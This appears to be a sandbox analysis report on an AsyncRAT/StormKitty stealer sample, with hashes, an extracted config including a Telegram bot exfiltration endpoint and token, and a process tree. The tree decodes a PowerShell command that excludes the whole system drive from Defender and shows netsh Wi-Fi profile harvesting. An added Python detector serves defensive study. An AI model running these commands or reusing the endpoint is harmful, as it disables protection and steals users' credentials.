Analysis
  max time kernel: 152s
  max time network: 158s
  platform: windows10-2004_x64
  resource: win10v2004-20230703-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 13-08-2023 09:50

  Static task: static1
  Behavioral task: behavioral1
    Sample: 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
    Resource: win7-20230712-en
  (The signature, memory and file paths in the sections below are tagged behavioral2; only behavioral1 appears in this task list.)
General
  Target: 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
  Size: 24.0MB
  MD5: fe7a215f58c846f671142227e0a71061
  SHA1: f40c456ce9f674ee93d3ef691c1b3aec0c53156b
  SHA256: 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827
  SHA512: ff7efbd82997f802339407e709f074277ea609ac1f30ba1d768c5daac4a4990b7a731361717874fe98d524e0a012333e8b45ea1f83a1cc793fd0a06d8296b1ae
  SSDEEP: 393216:VT4ER8LcdmjoDuUKQhgL9bH3x0PmFhpbgab/bKh17KfxRu7i4Kw5jnS01oufNTda:VT4ER0pjoNvhcX6u1blb/bEmZRGi4Lb5
Malware Config
  Extracted
    family: asyncrat
    group: Default
    c2: 127.0.0.1:6606
        127.0.0.1:7707
        127.0.0.1:8808
        (all three entries are loopback addresses; the config alone names no remote host)
    telegram bot endpoint: https://api.telegram.org/bot6085983475:AAG9ma6AdbwS2Vmvqb_xIeiP1vbivSAPlXU/sendMessage?chat_id=1829819531
    mutex: AsyncMutex_6SI8OkPnk
    delay: 3
    install: false
    install_folder: %AppData%
Signatures

StormKitty
  StormKitty is an open source info stealer written in C#.

StormKitty payload (5 IoCs)
  resource                                                                       yara_rule
  behavioral2/files/0x00070000000231c3-140.dat                                   family_stormkitty
  behavioral2/files/0x00070000000231c3-145.dat                                   family_stormkitty
  behavioral2/files/0x00070000000231c3-146.dat                                   family_stormkitty
  behavioral2/memory/2484-168-0x0000000000B40000-0x0000000000B70000-memory.dmp   family_stormkitty
  behavioral2/memory/980-173-0x0000028C88650000-0x0000028C88660000-memory.dmp    family_stormkitty

Async RAT payload (4 IoCs)
  resource                                                                       yara_rule
  behavioral2/files/0x00070000000231c3-140.dat                                   asyncrat
  behavioral2/files/0x00070000000231c3-145.dat                                   asyncrat
  behavioral2/files/0x00070000000231c3-146.dat                                   asyncrat
  behavioral2/memory/2484-168-0x0000000000B40000-0x0000000000B70000-memory.dmp   asyncrat

Executes dropped EXE (2 IoCs)
  pid    process
  2484   deneme.exe
  3160   ngrok.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Drops desktop.ini file(s) (8 IoCs)
  All paths are under C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Grabber\DRIVE-C\Users\Admin\ and all are written by deneme.exe:
  description                    ioc
  File opened for modification   Desktop\desktop.ini
  File created                   Documents\desktop.ini
  File created                   Downloads\desktop.ini
  File created                   Pictures\Camera Roll\desktop.ini
  File created                   Pictures\Saved Pictures\desktop.ini
  File created                   Pictures\desktop.ini
  File opened for modification   Pictures\desktop.ini
  File created                   Desktop\desktop.ini

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow   ioc
  32     icanhazip.com

Looks up geolocation information via web service
  Uses a legitimate geolocation service to find the infected system's geolocation info.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (31 IoCs, repeated entries collapsed)
  pid    process          hits
  980    powershell.exe   2
  3160   ngrok.exe        4
  2484   deneme.exe       25

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description               pid    process
  Token: SeDebugPrivilege   980    powershell.exe
  Token: SeDebugPrivilege   2484   deneme.exe

Suspicious use of WriteProcessMemory (28 IoCs, repeated entries collapsed)
  writer pid   writer process                                                                  target pid   procid_target   count
  4748         69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe         980          82              2
  4748         69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe         2484         84              3
  4748         69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe         3160         85              2
  2484         deneme.exe                                                                      3860         96              3
  3860         cmd.exe                                                                         1860         98              3
  3860         cmd.exe                                                                         2828         99              3
  3860         cmd.exe                                                                         1976         100             3
  2484         deneme.exe                                                                      3012         101             3
  3012         cmd.exe                                                                         3316         103             3
  3012         cmd.exe                                                                         4056         104             3
Processes

C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe  (PID 4748)
  command line: "C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"
  - Suspicious use of WriteProcessMemory
  |
  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 980)
  |     command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYgBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBhACMAPgA="
  |     decoded (base64 of UTF-16LE): <#sbf#>Add-MpPreference <#aub#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pnl#> -Force <#lza#>
  |       The <#...#> tokens are empty block comments inserted between arguments; the effective command is
  |       Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which adds the user's profile
  |       directory and the entire system drive to the Microsoft Defender Antivirus exclusion list.
  |     - Suspicious behavior: EnumeratesProcesses
  |     - Suspicious use of AdjustPrivilegeToken
  |
  +-- C:\Users\Admin\AppData\Local\Temp\deneme.exe  (PID 2484)
  |     command line: "C:\Users\Admin\AppData\Local\Temp\deneme.exe"
  |     - Executes dropped EXE
  |     - Drops desktop.ini file(s)
  |     - Suspicious behavior: EnumeratesProcesses
  |     - Suspicious use of AdjustPrivilegeToken
  |     - Suspicious use of WriteProcessMemory
  |     |
  |     +-- C:\Windows\SysWOW64\cmd.exe  (PID 3860)
  |     |     command line: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
  |     |     - Suspicious use of WriteProcessMemory
  |     |     +-- C:\Windows\SysWOW64\chcp.com     chcp 65001                 (PID 1860)
  |     |     +-- C:\Windows\SysWOW64\netsh.exe    netsh wlan show profile    (PID 2828)
  |     |     +-- C:\Windows\SysWOW64\findstr.exe  findstr All                (PID 1976)
  |     |
  |     +-- C:\Windows\SysWOW64\cmd.exe  (PID 3012)
  |           command line: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
  |           - Suspicious use of WriteProcessMemory
  |           +-- C:\Windows\SysWOW64\chcp.com     chcp 65001                            (PID 3316)
  |           +-- C:\Windows\SysWOW64\netsh.exe    netsh wlan show networks mode=bssid   (PID 4056)
  |
  +-- C:\Users\Admin\AppData\Local\Temp\ngrok.exe  (PID 3160)
        command line: "C:\Users\Admin\AppData\Local\Temp\ngrok.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
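The process tree above contains two behaviours a detection engineer would want to catch generically rather than by hash: an obfuscated -EncodedCommand that decodes to Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, and Wi-Fi profile harvesting through netsh wlan show profile / netsh wlan show networks mode=bssid. The following is an added example written for this report, not code from the sandbox or from the malware: it decodes the base64/UTF-16LE payload, strips the <#...#> comment padding, and runs a few rules over process-creation events. The event records are constructed from the PIDs and command lines on this page (the parent PID of 4748 is not on the page and is set to 0).

```python
"""Decode PowerShell -EncodedCommand payloads and flag Defender-exclusion
tampering and Wi-Fi profile harvesting in process-creation events.

Added example for this sandbox report; the event list below is
constructed from the report's process tree, not captured telemetry."""
import base64
import re
from dataclasses import dataclass

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...). -ExecutionPolicy must not match, so after "-e" only "c" or
# "n..." is allowed before the whitespace and the base64 blob.
ENC_RE = re.compile(r'-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]{16,})', re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 over UTF-16LE text; re-pad in case
    the '=' padding was stripped from the command line."""
    b64 = b64.strip().strip('"')
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-16-le")


def normalize(script: str) -> str:
    """Drop <# ... #> block comments (used as junk tokens in this sample)
    and collapse whitespace so keyword matching sees the real command."""
    stripped = re.sub(r"<#.*?#>", " ", script, flags=re.S)
    return re.sub(r"\s+", " ", stripped).strip()


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def effective_cmdline(ev: ProcEvent) -> str:
    """Command line with any -EncodedCommand payload decoded and normalized."""
    m = ENC_RE.search(ev.cmdline)
    if m and ev.image.lower().endswith("powershell.exe"):
        try:
            return normalize(decode_encoded_command(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            pass  # not a real payload; fall through to the raw command line
    return normalize(ev.cmdline)


def analyze(events):
    """Return (rule_name, pid) findings in event order."""
    findings = []
    for ev in events:
        cmd = effective_cmdline(ev).lower()
        img = ev.image.lower()
        if img.endswith("powershell.exe") and "add-mppreference" in cmd and "-exclusionpath" in cmd:
            rule = "defender_exclusion_added"
            # Excluding the profile root or the whole system drive disables
            # scanning for everything the user (or the dropper) writes.
            if "$env:systemdrive" in cmd or "$env:userprofile" in cmd:
                rule = "defender_exclusion_broad_scope"
            findings.append((rule, ev.pid))
        if img.endswith("netsh.exe") and "wlan show profile" in cmd:
            findings.append(("wifi_profile_enumeration", ev.pid))
        if img.endswith("netsh.exe") and "wlan show networks" in cmd and "mode=bssid" in cmd:
            findings.append(("wifi_bssid_survey", ev.pid))
    return findings


# Constructed from the report's process tree (PPID of the sample is unknown -> 0).
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = "PAAjAHMAYgBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBhACMAPgA="
EVENTS = [
    ProcEvent(4748, 0, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(980, 4748, PS, '"' + PS + '" -EncodedCommand "' + ENCODED + '"'),
    ProcEvent(2484, 4748, r"C:\Users\Admin\AppData\Local\Temp\deneme.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\deneme.exe"'),
    ProcEvent(3860, 2484, r"C:\Windows\SysWOW64\cmd.exe",
              '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    ProcEvent(2828, 3860, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show profile"),
    ProcEvent(3012, 2484, r"C:\Windows\SysWOW64\cmd.exe",
              '"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'),
    ProcEvent(4056, 3012, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show networks mode=bssid"),
    ProcEvent(3160, 4748, r"C:\Users\Admin\AppData\Local\Temp\ngrok.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\ngrok.exe"'),
]

if __name__ == "__main__":
    print("decoded:", effective_cmdline(EVENTS[1]))
    for rule, pid in analyze(EVENTS):
        print(f"{rule:32} pid={pid}")
```

Matching on the decoded and comment-stripped text is the point: a rule that looks for the literal string Add-MpPreference in the raw command line never fires on this sample, and a rule that decodes but does not strip comments can be defeated by the same junk tokens placed inside the cmdlet name's neighbours. The cmd.exe wrappers are deliberately not flagged here; the netsh child processes carry the same command text and are the less ambiguous signal.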
Network
MITRE ATT&CK Enterprise v15
Downloads

(unnamed)
  Filesize: 1B
  MD5: cfcd208495d565ef66e7dff9f98764da
  SHA1: b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
  SHA256: 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
  SHA512: 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
  (these are the digests of the single ASCII character "0")

C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\Browsers\Firefox\Bookmarks.txt
  Filesize: 105B
  MD5: 2e9d094dda5cdc3ce6519f75943a4ff4
  SHA1: 5d989b4ac8b699781681fe75ed9ef98191a5096c
  SHA256: c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
  SHA512: d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\6f627568f974c19c11aa9116512e52c0\Admin@MSXGLQPS_en-US\System\Process.txt
  Filesize: 4KB
  MD5: ab2421d1e0be0b16ce519f2af166c747
  SHA1: e0f76610778e24b83eea090cd630b89fd8dc3e77
  SHA256: b90027f576cb86cc1374a0ae20bc2c093ab96e3146407e9a01476f41c3fc2ab5
  SHA512: bd38084f17badc6fb6056286dfac4a0307e9e5a75d038795ca0c7886322556e43f0e1df1b7cc45bc1ce88fcfe595b98f58a63efc7d2f6a529fcd43b282d299b7

(unnamed)
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

(unnamed; listed three times with identical hashes)
  Filesize: 170KB
  MD5: 958062458cd994df325348bb9f8f9d11
  SHA1: 6d678d971f4239f9304a3a6ac9941b9d7de1ba27
  SHA256: 109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
  SHA512: e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff

(unnamed; listed three times with identical hashes)
  Filesize: 23.8MB
  MD5: 1c900bf7791f168639d27e19a90a9be7
  SHA1: ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
  SHA256: b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
  SHA512: c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988